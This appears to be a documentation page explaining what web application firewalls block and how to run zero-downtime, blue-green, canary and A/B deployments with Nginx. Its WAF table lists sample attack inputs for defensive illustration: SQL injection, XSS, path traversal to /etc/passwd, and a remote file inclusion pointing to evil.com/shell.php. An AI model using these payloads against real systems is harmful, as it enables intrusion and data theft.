Web Application Firewall (WAF)¶

A WAF inspects HTTP/HTTPS traffic and blocks malicious requests before they reach your application. It operates at Layer 7, understanding HTTP semantics.

What a WAF Protects Against¶

Attack Category	Examples	WAF Rule
SQL Injection	`' OR 1=1 --`, `UNION SELECT`	Detect SQL keywords in query params/body
Cross-Site Scripting (XSS)	`<script>alert(1)</script>`	Detect HTML/JS in input fields
Path Traversal	`../../etc/passwd`	Detect directory traversal patterns
HTTP Protocol Violations	Malformed headers, invalid methods	Enforce HTTP spec compliance
Bot Traffic	Scrapers, credential stuffing	Rate limiting, CAPTCHA, bot signatures
File Inclusion	`include=http://evil.com/shell.php`	Block remote file references

OWASP Core Rule Set (CRS) is the standard open-source WAF rule set, covering the OWASP Top 10 vulnerabilities. It runs on ModSecurity (Nginx/Apache module), Coraza (Go), and cloud WAFs.

Cloud WAFs (AWS WAF, Cloudflare WAF, Azure WAF) provide managed rule sets and are simpler to operate than self-hosted solutions. AWS WAF integrates with ALB and CloudFront, inspecting requests at the edge before they reach your backend.

False positives are the biggest operational challenge with WAFs. A legitimate request containing the word SELECT (e.g., a product named "Select Premium") might be blocked by SQL injection rules. Manage false positives with: a learning mode/logging-only period before enforcement, per-rule exceptions, URI-specific rule overrides, and regular rule tuning.

Production Deployment Patterns¶

Zero-Downtime Deployments with Nginx¶

Nginx supports graceful reloads (nginx -s reload) that enable zero-downtime configuration changes:

Master process spawns new worker processes with the new configuration
Master process signals old worker processes to stop accepting new connections
Old workers finish processing active requests, then exit
Only new workers remain, running the updated configuration

No connections are dropped during this process.

Blue-Green with Proxy Switching¶

# Blue-green deployment: switch backends by changing upstream

# Active (green):
upstream app_backend {
    server 10.0.1.10:8080;    # Green instances
    server 10.0.1.11:8080;
}

# To switch to blue, update config and reload:
# upstream app_backend {
#     server 10.0.2.10:8080;  # Blue instances
#     server 10.0.2.11:8080;
# }

Canary Releases via Weighted Routing¶

# Route 5% of traffic to canary, 95% to stable
upstream app_stable {
    server 10.0.1.10:8080;
    server 10.0.1.11:8080;
}

upstream app_canary {
    server 10.0.2.10:8080;
}

split_clients "${remote_addr}" $upstream_variant {
    5%   canary;
    *    stable;
}

server {
    location /api/ {
        if ($upstream_variant = "canary") {
            proxy_pass http://app_canary;
        }
        proxy_pass http://app_stable;
    }
}

A/B Testing at the Proxy Layer¶

# Route users to different backends based on cookie
map $cookie_ab_group $backend {
    "A"     app_variant_a;
    "B"     app_variant_b;
    default app_variant_a;
}

upstream app_variant_a {
    server 10.0.1.10:8080;
}

upstream app_variant_b {
    server 10.0.2.10:8080;
}

server {
    location /api/ {
        # Set A/B cookie if not present
        if ($cookie_ab_group = "") {
            add_header Set-Cookie "ab_group=A; Path=/; Max-Age=2592000";
            # (In practice, randomize A/B assignment with a map or Lua script)
        }
        proxy_pass http://$backend;
    }
}

Comparison Summary¶

Feature	Nginx	Apache	Caddy	HAProxy	Traefik
Primary role	Web server + proxy	Web server	Web server + proxy	Load balancer + proxy	Proxy + discovery
Auto HTTPS	No (use certbot)	No (use certbot)	Yes (built-in)	No	Yes (built-in)
Config language	Custom DSL	Custom DSL	Caddyfile / JSON	Custom DSL	YAML / labels
Dynamic config	Reload required	.htaccess (per-dir)	API + hot reload	Reload required	Auto-discovery
K8s integration	Ingress controller	Limited	Ingress controller	Ingress controller	Native (CRDs)
Performance	Excellent	Good	Good	Excellent	Good
Best for	General-purpose	Legacy, mod_php	Simple setups, auto-TLS	High-perf LB	Container environments